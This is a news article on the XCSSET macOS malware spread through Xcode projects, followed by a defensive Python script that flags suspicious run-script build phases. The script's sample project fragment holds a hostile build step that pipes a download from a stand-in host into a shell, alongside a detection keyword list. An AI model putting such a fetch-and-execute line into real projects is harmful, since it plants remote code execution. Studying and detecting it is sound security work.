The latest macOS malware was uncovered by security researchers at the antivirus vendor Trend Micro. It is particularly clever in its implementation: the malicious code is transmitted via Xcode projects, the development tool used to create apps for all Apple platforms (via PCMag).
The hackers created malicious code that is injected into local Xcode projects and runs when the project is built. It can spread both via the Xcode projects themselves, which has already been traced to some projects shared via GitHub, and via the resulting apps.
How the XCSSET Malware works
The malware, according to the Trend Micro team, makes use of “two zero-day exploits: one is used to steal cookies via a flaw in the behavior of Data Vaults, another is used to abuse the development version of Safari.” This could allow it to carry out a number of dangerous behaviors, including stealing information from your Evernote, Notes, Skype, Telegram, QQ and WeChat apps. It could capture screenshots from your system, upload files from your Mac to the hacker’s server, or encrypt files on your Mac and display a ransom note. Further actions that are theoretically possible given its ability to inject JavaScript code into Safari include modifying the websites that you are viewing, modifying or replacing cryptocurrency addresses, stealing payment credentials or credit card info, blocking or capturing passwords, and capturing screenshots of any sites visited. A full technical brief on what Trend Micro is calling the “XCSSET Malware” is available from Trend Micro for those interested in additional details.
How to protect yourself from the XCSSET Malware
One of Trend Micro’s primary messages was a warning for developers to check their projects to ensure that they are free from this problem. For consumers, the best way to protect yourself is to download apps only from the App Store or from trusted vendors’ existing sites. Beyond that, consider some form of antivirus protection capable of detecting this kind of malware and removing it from your system before it can cause any serious harm.
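Trend Micro’s advice that developers check their projects, as an added example that is not from the article or from Trend Micro: the script below inventories the run-script build phases in an Xcode project.pbxproj, the place where a project stores shell commands that execute on every build. The article does not say which mechanism XCSSET uses; the sample project fragment, object IDs and keyword list are constructed assumptions.

```python
"""Inventory the run-script build phases in an Xcode project.pbxproj.
A PBXShellScriptBuildPhase runs shell on every build, so each one gets a
human look; the keyword list (my assumption, not from the article) marks
phases that fetch, decode or evaluate code at build time for triage first.
"""
import re
import sys

# Constructed sample fragment of a project.pbxproj (not a real project).
SAMPLE_PBXPROJ = r'''
		AA0000000000000000000001 /* SwiftLint */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		AA0000000000000000000002 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "curl -s http://stage.invalid/x | base64 -d | sh\n";
		};
'''

PHASE_RE = re.compile(
    r'(\S+) /\* ([^*]*) \*/ = \{\s*isa = PBXShellScriptBuildPhase;(.*?)\n\s*\};',
    re.S)
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.S)
# Legitimate build scripts rarely need to download, decode or eval code.
RISKY = re.compile(r'\b(curl|wget|base64|eval|osascript)\b')

def unescape(s):
    """Undo pbxproj backslash escapes (newline, tab, quote, backslash)."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s)

def find_script_phases(text):
    """Return [(object_id, name, script)] for every run-script phase."""
    out = []
    for obj_id, name, body in PHASE_RE.findall(text):
        m = SCRIPT_RE.search(body)
        out.append((obj_id, name, unescape(m.group(1)) if m else ''))
    return out

def audit(text):
    """Return [(object_id, name, risky)]; risky=True means triage first."""
    return [(i, n, bool(RISKY.search(s))) for i, n, s in find_script_phases(text)]

if __name__ == '__main__':
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for obj_id, name, risky in audit(src):
        print(('RISKY ' if risky else 'review') + f' {obj_id} {name}')
```

Run it against `MyApp.xcodeproj/project.pbxproj`; a phase that is not referenced from any target’s buildPhases list still deserves a look, since it can be wired in by a later commit.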